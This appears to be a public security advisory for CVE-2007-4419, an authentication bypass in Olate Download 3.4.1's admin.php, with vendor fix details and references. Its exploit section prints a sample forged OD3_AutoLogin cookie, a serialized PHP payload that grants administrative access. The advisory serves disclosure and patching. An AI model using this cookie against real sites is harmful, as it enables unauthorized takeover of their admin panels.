Olate Download Admin.PHP Remote Authentication Bypass Vulnerability

Bugtraq ID:	25343
Class:	Access Validation Error
CVE:	CVE-2007-4419
Remote:	Yes
Local:	No
Published:	Aug 16 2007 12:00AM
Updated:	May 07 2015 05:36PM
Credit:	imei addmimistrator is credited with the discovery of this issue.
Vulnerable:	Olate Download 3.4.1
Not Vulnerable:	Olate Download 3.4.2

Olate Download Admin.PHP Remote Authentication Bypass Vulnerability

Olate Download is prone to an authentication-bypass vulnerability.

An attacker can exploit this issue to gain administrative access to the affected application. Successfully exploiting this issue will result in the remote compromise of the affected application.

Versions prior to Olate Download 3.4.2 are vulnerable.

Olate Download Admin.PHP Remote Authentication Bypass Vulnerability

Attackers can use a browser to exploit this issue.

The following sample cookie is available:

OD3_AutoLogin=17225df9b911486c1ccae0378094c33a::a:3:{i:0;i:2;i:1;s:4:\"imei\";i:2;i:2;}

Olate Download Admin.PHP Remote Authentication Bypass Vulnerability

Solution:
The vendor released Olate Download 3.4.2 to address this issue. Please see the references for more information.


Olate Download 3.4.1

• Olate OlateDownload-3.4.2.zip
  http://downloads.sourceforge.net/olatedownload/OlateDownload-3.4.2.zip ?modtime=1187569064&big_mirror=0

Olate Download Admin.PHP Remote Authentication Bypass Vulnerability

References:

• Olate Download Homepage (Olate)
  
• Olate Download 3.4.1 ~ admin.php ~ Admin authentication bypassing ([email protected])
  
• Re: Olate Download 3.4.1 ~ admin.php ~ Admin authentication bypassing ([email protected])
  
• Olate Download 3.4.1 ~ admin.php ~ authentication bypassing (imei addmimistrator)